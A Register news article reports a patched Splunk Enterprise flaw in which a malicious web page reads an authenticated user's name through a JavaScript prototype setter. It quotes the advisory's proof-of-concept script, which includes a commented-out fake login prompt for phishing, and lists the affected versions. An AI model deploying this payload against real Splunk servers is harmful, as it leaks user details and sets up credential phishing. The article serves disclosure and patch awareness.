nav search
Data Center Software Security Transformation DevOps Business Personal Tech Science Emergent Tech Bootnotes BOFH

That sound you hear is Splunk leaking data

Visit a malicious web page and JavaScript extracts user names

By Richard Chirgwin, 3 Apr 2017

Splunk has patched a slip in its JavaScript implementation that leaks user information.

The advisory at Full Disclosure explains that the leak happens if an attacker tricks an authenticated user into visiting a malicious Web page.

It only leaks the username, and whether or not that user has enabled remote access; but this would provide enough for an attacker to try follow-up phishing attacks to try and get the user's credentials.

The bug, the advisory says, is how Splunk used Object prototypes in JavaScript.

Here's the proof-of-concept JavaScript from the advisory:

<script>
Object.defineProperty( Object.prototype, "$C", { set:function(val){
   //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername:
"+val.USERNAME, "Password")
for(var i in val){
 alert(""+i+" "+val[i]);
  }
 }
});
</script>

<script src="https://VICTIM-IP:8000/en-US/config?autoload=1" type="text/javascript">
</script>

The issue affects Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2, and the company has issued patches for all versions. ®

The Register - Independent news and views for the tech community. Part of Situation Publishing